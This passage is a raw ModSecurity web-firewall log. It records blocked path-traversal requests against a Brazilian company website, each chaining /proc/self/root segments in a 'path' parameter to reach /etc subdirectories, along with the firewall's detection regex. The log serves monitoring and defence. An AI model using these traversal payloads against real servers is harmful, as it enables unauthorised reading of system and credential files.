"abhDP9SswJuvopo3lOhp_AAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:00.720495 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.243.203:60232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDQFajLEzk2WiQ-10dXQAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:01.571645 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:50412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDQVajLEzk2WiQ-10dXgAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:02.315644 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.243.203:60238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDQqQpVkWug9HeOt9BowAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:03.153043 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:50416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDQ7ABkC4fWIHEf8H7EQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:06.043512 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:60240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDRlajLEzk2WiQ-10dZgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:08.669583 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:60244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDSI6lpbStxTqkSkt3OgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:10.810779 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.228.16:35274] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhDSnjZBu2q05ozVU9lnQAAAUQ"]
[Mon Mar 16 14:52:12.712131 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:50420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDTKTCbgAP5jq5Teg35gAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:14.003474 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:60250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDTnjZBu2q05ozVU9logAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:14.251895 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:54162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDTtSswJuvopo3lOhqAAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:15.663440 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:54172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDT1ajLEzk2WiQ-10daQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:16.887028 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:47740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDUJqj1wV0Si-Okef6dwAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:17.163928 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:54180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDUZqj1wV0Si-Okef6eAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:18.331658 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.243.203:47742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDUqQpVkWug9HeOt9BrQAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:18.427275 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:53828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDUqQpVkWug9HeOt9BrgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:19.721608 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:47744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDU7ABkC4fWIHEf8H7FgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:22.336223 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:53830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDVv9ocpUE4ed4uDz7HAAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:22.507913 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:48158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDVtSswJuvopo3lOhqBwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:23.871720 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:53846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDV9SswJuvopo3lOhqCAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:23.956306 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:48174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDV_9ocpUE4ed4uDz7HQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:52:25.159653 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:53860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDWbABkC4fWIHEf8H7GgAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:52:25.343492 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:48180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDWdSswJuvopo3lOhqCwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
